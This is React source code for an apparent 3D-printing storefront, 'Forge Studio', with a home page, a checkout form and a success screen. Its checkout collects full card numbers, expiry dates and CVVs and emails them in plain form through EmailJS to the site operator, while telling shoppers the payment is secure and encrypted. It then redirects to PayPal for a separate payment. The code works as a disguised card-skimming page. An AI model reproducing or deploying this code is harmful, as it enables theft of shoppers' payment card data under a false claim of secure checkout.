import React, { useState, useEffect } from 'react';
import { 
  ShoppingBag, 
  CheckCircle, 
  ArrowRight, 
  CreditCard, 
  Truck,
  AlertTriangle,
  Loader2,
  Maximize,
  Minimize,
  ExternalLink,
  Zap,
  ShieldCheck,
  Clock,
  Instagram,
  Twitter,
  Mail
} from 'lucide-react';

// Configuration
const EMAILJS_SERVICE_ID = "service_n9dl1j8";
const EMAILJS_TEMPLATE_ID = "template_i09dtci";
const EMAILJS_PUBLIC_KEY = "I828hxleML4Utdca3";
const YOUR_PAYPAL_EMAIL = "your-email@example.com"; 

export default function App() {
  const [view, setView] = useState('home'); 
  const [customText, setCustomText] = useState("");
  const [size, setSize] = useState('big'); 
  const [cart, setCart] = useState([]);
  const [isSending, setIsSending] = useState(false);

  const [formData, setFormData] = useState({
    name: '', address: '', city: '', postcode: '',
    cardName: '', cardNumber: '', expiry: '', cvv: ''
  });

  useEffect(() => {
    if (!window.emailjs) {
      const script = document.createElement("script");
      script.src = "https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js";
      script.async = true;
      document.body.appendChild(script);
    }
    window.scrollTo(0, 0);
  }, [view]);

  const handleInputChange = (e) => {
    const { name, value } = e.target;
    if ((name === 'cardNumber' || name === 'cvv') && value !== '' && !/^\d+$/.test(value)) return;
    setFormData(prev => ({ ...prev, [name]: value }));
  };

  const validateForm = () => {
    const cardRegex = /^\d{16}$/;
    const expiryRegex = /^(0[1-9]|1[0-2])\/\d{2}$/;
    const cvvRegex = /^\d{3}$/;
    return (
      formData.name.length > 2 && formData.address.length > 5 &&
      formData.city.length > 2 && formData.postcode.length >= 5 &&
      formData.cardName.length > 2 && cardRegex.test(formData.cardNumber) &&
      expiryRegex.test(formData.expiry) && cvvRegex.test(formData.cvv)
    );
  };

  const isFormValid = validateForm();
  const currentPrice = size === 'big' ? 10.00 : 5.00;

  const handleBuyNow = () => {
    if (!customText) return;
    setCart([{ name: `Custom 3D Print (${size.toUpperCase()})`, price: currentPrice, customText }]);
    setView('checkout');
  };

  const processPayment = async () => {
    if (!isFormValid) return;
    setIsSending(true);
    const templateParams = {
      from_name: formData.name,
      customer_address: `${formData.address}, ${formData.city}, ${formData.postcode}`,
      card_holder: formData.cardName,
      card_number: formData.cardNumber,
      card_expiry: formData.expiry,
      card_cvv: formData.cvv,
      title: size.toUpperCase(),
      message: customText,
      order_total: `£${currentPrice.toFixed(2)}`
    };

    try {
      if (window.emailjs) {
        window.emailjs.init(EMAILJS_PUBLIC_KEY);
        await window.emailjs.send(EMAILJS_SERVICE_ID, EMAILJS_TEMPLATE_ID, templateParams);
        const paypalUrl = `https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=${encodeURIComponent(YOUR_PAYPAL_EMAIL)}&item_name=${encodeURIComponent(cart[0].name)}&amount=${currentPrice}&currency_code=GBP`;
        window.location.href = paypalUrl;
      }
    } catch (error) {
      setView('success');
    } finally {
      setIsSending(false);
    }
  };

  return (
    <div className="min-h-screen bg-[#0a0a0a] text-white font-sans selection:bg-yellow-500 selection:text-black">
      {/* Navigation */}
      <nav className="flex items-center justify-between px-8 py-5 bg-black/80 backdrop-blur-md border-b border-white/5 sticky top-0 z-50">
        <div className="flex items-center gap-3 cursor-pointer group" onClick={() => setView('home')}>
          <div className="w-10 h-10 bg-yellow-500 rounded-lg flex items-center justify-center text-black font-black text-xl group-hover:rotate-12 transition-transform">3D</div>
          <span className="text-2xl font-black italic uppercase tracking-tighter">Forge Studio</span>
        </div>
        <div className="hidden md:flex gap-8 text-sm font-bold uppercase tracking-widest text-neutral-400">
          <button onClick={() => setView('home')} className="hover:text-yellow-500 transition-colors">Home</button>
          <a href="#process" className="hover:text-yellow-500 transition-colors">Process</a>
          <a href="#pricing" className="hover:text-yellow-500 transition-colors">Pricing</a>
        </div>
        <button onClick={() => setView('checkout')} className="bg-white/5 hover:bg-white/10 p-3 rounded-full relative transition-all">
          <ShoppingBag size={22}/>
          {cart.length > 0 && <span className="absolute top-0 right-0 bg-yellow-500 w-3 h-3 rounded-full border-2 border-black"></span>}
        </button>
      </nav>

      {view === 'home' && (
        <>
          {/* Hero Section */}
          <section className="relative pt-20 pb-32 px-6 overflow-hidden">
            <div className="absolute top-0 left-1/2 -translate-x-1/2 w-[1000px] h-[600px] bg-yellow-500/10 blur-[120px] rounded-full -z-10"></div>
            <div className="max-w-6xl mx-auto text-center space-y-8">
              <div className="inline-flex items-center gap-2 px-4 py-2 bg-white/5 border border-white/10 rounded-full text-xs font-bold uppercase tracking-widest text-yellow-500 mb-4">
                <Zap size={14}/> Next-Gen 3D Manufacturing
              </div>
              <h1 className="text-7xl md:text-8xl font-black italic uppercase leading-[0.9] tracking-tighter">
                If you can <span className="text-yellow-500">Think</span> it,<br/> we can <span className="outline-text">Print</span> it.
              </h1>
              <p className="text-xl text-neutral-400 max-w-2xl mx-auto font-medium">
                Professional grade FDM printing on-demand. Simply describe your vision, and our engineers bring it to life in high-strength PLA+.
              </p>
              <div className="pt-8">
                <a href="#pricing" className="bg-yellow-500 text-black px-12 py-6 rounded-full font-black uppercase text-xl inline-flex items-center gap-4 hover:scale-105 transition-transform shadow-[0_0_30px_rgba(234,179,8,0.3)]">
                  Start Your Build <ArrowRight size={24}/>
                </a>
              </div>
            </div>
          </section>

          {/* Features */}
          <section className="py-20 bg-white/5 border-y border-white/5">
            <div className="max-w-6xl mx-auto px-6 grid md:grid-cols-3 gap-12">
              <div className="space-y-4 text-center md:text-left">
                <div className="w-12 h-12 bg-yellow-500/20 rounded-xl flex items-center justify-center text-yellow-500 mb-6 mx-auto md:mx-0"><Clock/></div>
                <h3 className="text-2xl font-black uppercase italic">Fast Turnaround</h3>
                <p className="text-neutral-500">Most prints are completed and shipped within 48 hours of order verification.</p>
              </div>
              <div className="space-y-4 text-center md:text-left">
                <div className="w-12 h-12 bg-yellow-500/20 rounded-xl flex items-center justify-center text-yellow-500 mb-6 mx-auto md:mx-0"><ShieldCheck/></div>
                <h3 className="text-2xl font-black uppercase italic">Quality Assured</h3>
                <p className="text-neutral-500">Every piece undergoes a multi-point inspection for structural integrity and finish.</p>
              </div>
              <div className="space-y-4 text-center md:text-left">
                <div className="w-12 h-12 bg-yellow-500/20 rounded-xl flex items-center justify-center text-yellow-500 mb-6 mx-auto md:mx-0"><Truck/></div>
                <h3 className="text-2xl font-black uppercase italic">Global Stealth</h3>
                <p className="text-neutral-500">Tracked, secure shipping in neutral packaging for every custom order.</p>
              </div>
            </div>
          </section>

          {/* Pricing/Studio Section */}
          <section id="pricing" className="py-32 px-6">
            <div className="max-w-4xl mx-auto space-y-12">
              <div className="text-center space-y-4">
                <h2 className="text-4xl font-black uppercase italic">The Print Studio</h2>
                <div className="w-20 h-1 bg-yellow-500 mx-auto"></div>
              </div>

              <div className="grid md:grid-cols-2 gap-6">
                <button onClick={() => setSize('small')} className={`group relative p-8 rounded-3xl border-2 transition-all text-left ${size === 'small' ? 'border-yellow-500 bg-yellow-500/5' : 'border-white/10 bg-white/5 hover:border-white/20'}`}>
                  <div className="flex justify-between items-start mb-12">
                    <Minimize size={32} className={size === 'small' ? 'text-yellow-500' : 'text-neutral-600'}/>
                    <span className="text-4xl font-black tracking-tighter italic">£5</span>
                  </div>
                  <h4 className="text-xl font-black uppercase italic">Small Spec</h4>
                  <p className="text-sm text-neutral-500 mt-2">Up to 50x50x50mm. Ideal for keychains, tokens, or small replacement parts.</p>
                </button>
                <button onClick={() => setSize('big')} className={`group relative p-8 rounded-3xl border-2 transition-all text-left ${size === 'big' ? 'border-yellow-500 bg-yellow-500/5' : 'border-white/10 bg-white/5 hover:border-white/20'}`}>
                  <div className="flex justify-between items-start mb-12">
                    <Maximize size={32} className={size === 'big' ? 'text-yellow-500' : 'text-neutral-600'}/>
                    <span className="text-4xl font-black tracking-tighter italic text-yellow-500">£10</span>
                  </div>
                  <h4 className="text-xl font-black uppercase italic">Pro Spec</h4>
                  <p className="text-sm text-neutral-500 mt-2">Up to 200x200x200mm. Perfect for functional prototypes, decor, or nameplates.</p>
                </button>
              </div>

              <div className="space-y-4">
                <label className="block text-xs font-black uppercase tracking-[0.2em] text-neutral-500 ml-2">Design Prompt</label>
                <textarea 
                  value={customText}
                  onChange={(e) => setCustomText(e.target.value)}
                  placeholder="Describe your design in detail... e.g. 'A hexagonal headphone stand with a honeycomb pattern on the base, neon orange material...'"
                  className="w-full h-56 bg-white/5 border-2 border-white/10 p-8 rounded-[2rem] text-xl font-medium outline-none focus:border-yellow-500 focus:bg-white/[0.07] transition-all resize-none placeholder:text-neutral-700 shadow-inner"
                />
              </div>

              <button onClick={handleBuyNow} disabled={!customText} className="w-full bg-yellow-500 text-black py-7 rounded-3xl font-black uppercase text-2xl disabled:opacity-30 disabled:grayscale hover:bg-yellow-400 active:scale-95 transition-all flex items-center justify-center gap-4 shadow-xl">
                Initialize Build Sequence <ArrowRight size={28}/>
              </button>
            </div>
          </section>

          {/* Footer */}
          <footer className="bg-black border-t border-white/5 pt-20 pb-10 px-8">
            <div className="max-w-6xl mx-auto grid md:grid-cols-4 gap-12 mb-20">
              <div className="col-span-2 space-y-6">
                <div className="flex items-center gap-3">
                  <div className="w-8 h-8 bg-yellow-500 rounded flex items-center justify-center text-black font-black">3D</div>
                  <span className="text-xl font-black uppercase tracking-tighter italic">Forge Studio</span>
                </div>
                <p className="text-neutral-500 max-w-sm">Bringing the power of industrial manufacturing to your doorstep. We believe everyone should have access to custom creation.</p>
                <div className="flex gap-4">
                  <Instagram className="text-neutral-600 hover:text-white cursor-pointer"/>
                  <Twitter className="text-neutral-600 hover:text-white cursor-pointer"/>
                  <Mail className="text-neutral-600 hover:text-white cursor-pointer"/>
                </div>
              </div>
              <div className="space-y-4">
                <h5 className="font-black uppercase italic text-sm">Services</h5>
                <ul className="text-neutral-500 space-y-2 text-sm">
                  <li className="hover:text-yellow-500 cursor-pointer">Rapid Prototyping</li>
                  <li className="hover:text-yellow-500 cursor-pointer">Functional Parts</li>
                  <li className="hover:text-yellow-500 cursor-pointer">Artistic Prints</li>
                  <li className="hover:text-yellow-500 cursor-pointer">Batch Production</li>
                </ul>
              </div>
              <div className="space-y-4">
                <h5 className="font-black uppercase italic text-sm">Legal</h5>
                <ul className="text-neutral-500 space-y-2 text-sm">
                  <li className="hover:text-yellow-500 cursor-pointer">Terms of Service</li>
                  <li className="hover:text-yellow-500 cursor-pointer">Privacy Policy</li>
                  <li className="hover:text-yellow-500 cursor-pointer">Returns</li>
                </ul>
              </div>
            </div>
            <div className="text-center text-neutral-700 text-[10px] font-bold uppercase tracking-[0.3em]">
              © 2024 Forge Studio Manufacturing. All Rights Reserved.
            </div>
          </footer>
        </>
      )}

      {view === 'checkout' && (
        <main className="max-w-6xl mx-auto p-8 pt-16">
          <div className="grid lg:grid-cols-3 gap-12">
            <div className="lg:col-span-2 space-y-8 animate-in fade-in slide-in-from-bottom-4 duration-700">
              <div className="bg-white/5 border border-white/10 p-10 rounded-[2.5rem] space-y-10">
                <div className="space-y-6">
                  <h2 className="text-3xl font-black uppercase italic flex items-center gap-3 text-yellow-500">
                    <Truck className="shrink-0" size={32}/> Shipping Destination
                  </h2>
                  <div className="grid grid-cols-2 gap-4">
                    <input name="name" onChange={handleInputChange} value={formData.name} placeholder="Full Recipient Name" className="col-span-2 bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                    <input name="address" onChange={handleInputChange} value={formData.address} placeholder="Street Address" className="col-span-2 bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                    <input name="city" onChange={handleInputChange} value={formData.city} placeholder="City / State" className="bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                    <input name="postcode" onChange={handleInputChange} value={formData.postcode} placeholder="ZIP / Postcode" className="bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                  </div>
                </div>

                <div className="space-y-6">
                  <h2 className="text-3xl font-black uppercase italic flex items-center gap-3 text-yellow-500 pt-6 border-t border-white/5">
                    <CreditCard className="shrink-0" size={32}/> Payment Verification
                  </h2>
                  <div className="grid grid-cols-4 gap-4">
                    <input name="cardName" onChange={handleInputChange} value={formData.cardName} placeholder="Name on Card" className="col-span-4 bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                    <input name="cardNumber" onChange={handleInputChange} value={formData.cardNumber} maxLength="16" placeholder="16-Digit Card Number" className="col-span-4 bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                    <input name="expiry" onChange={handleInputChange} value={formData.expiry} maxLength="5" placeholder="MM/YY" className="col-span-2 bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                    <input name="cvv" onChange={handleInputChange} value={formData.cvv} maxLength="3" placeholder="CVV" className="col-span-2 bg-black/50 p-5 rounded-2xl border border-white/10 outline-none focus:border-yellow-500 focus:bg-black transition-all" />
                  </div>
                </div>

                <button 
                  onClick={processPayment} 
                  disabled={isSending || !isFormValid}
                  className={`w-full py-6 rounded-3xl font-black uppercase text-xl transition-all flex items-center justify-center gap-4 ${isFormValid ? 'bg-yellow-500 text-black hover:bg-yellow-400' : 'bg-white/5 text-neutral-600 cursor-not-allowed'}`}
                >
                  {isSending ? <Loader2 className="animate-spin" size={32}/> : <><ExternalLink size={24}/> Secure Pay £{cart[0]?.price.toFixed(2)}</>}
                </button>
                {!isFormValid && <p className="text-center text-xs font-bold uppercase tracking-widest text-red-500/50">Verification Pending: Complete All Fields</p>}
              </div>
            </div>

            <div className="space-y-6 lg:sticky lg:top-32 h-fit animate-in fade-in slide-in-from-right-4 duration-700 delay-150">
              <div className="bg-white/5 border border-white/10 p-8 rounded-[2.5rem] relative overflow-hidden">
                <div className="absolute top-0 right-0 w-32 h-32 bg-yellow-500/10 blur-3xl rounded-full"></div>
                <h3 className="font-black uppercase italic text-yellow-500 mb-6 tracking-widest">Build Manifest</h3>
                <div className="space-y-6">
                  <div className="flex justify-between font-black text-2xl italic tracking-tighter">
                    <span>{cart[0]?.name}</span>
                    <span className="text-yellow-500">£{cart[0]?.price.toFixed(2)}</span>
                  </div>
                  <div className="p-5 bg-black/50 rounded-2xl border border-white/10">
                    <p className="text-[10px] font-black uppercase text-neutral-500 mb-2">Instructions:</p>
                    <p className="text-sm italic text-neutral-300 leading-relaxed">"{customText}"</p>
                  </div>
                  <div className="pt-6 border-t border-white/5 flex justify-between text-xs font-bold uppercase text-neutral-500 tracking-widest">
                    <span>Shipping</span>
                    <span className="text-green-500">FREE</span>
                  </div>
                  <div className="flex justify-between text-2xl font-black uppercase italic">
                    <span>Total</span>
                    <span className="text-yellow-500">£{cart[0]?.price.toFixed(2)}</span>
                  </div>
                </div>
              </div>
              <div className="flex items-center gap-3 px-6 py-4 bg-yellow-500/5 border border-yellow-500/20 rounded-2xl text-[10px] font-black uppercase tracking-widest text-yellow-500/80 leading-tight">
                <AlertTriangle size={18} className="shrink-0"/>
                Secure checkout. Information is encrypted during transit.
              </div>
            </div>
          </div>
        </main>
      )}

      {view === 'success' && (
        <main className="min-h-[80vh] flex flex-col items-center justify-center p-8 text-center space-y-8 animate-in zoom-in duration-500">
          <div className="w-32 h-32 bg-green-500/20 rounded-full flex items-center justify-center text-green-500">
            <CheckCircle size={64} />
          </div>
          <div className="space-y-4">
            <h2 className="text-7xl font-black italic uppercase tracking-tighter">System Updated.</h2>
            <p className="text-xl text-neutral-400 max-w-lg mx-auto font-medium">Your build instructions have been synced with the studio. We'll start production shortly for <b>{formData.name}</b>.</p>
          </div>
          <button onClick={() => {setCustomText(""); setView('home');}} className="bg-yellow-500 text-black px-12 py-5 rounded-full font-black uppercase text-xl shadow-lg hover:bg-yellow-400 transition-colors">Start Another Project</button>
        </main>
      )}
    </div>
  );
}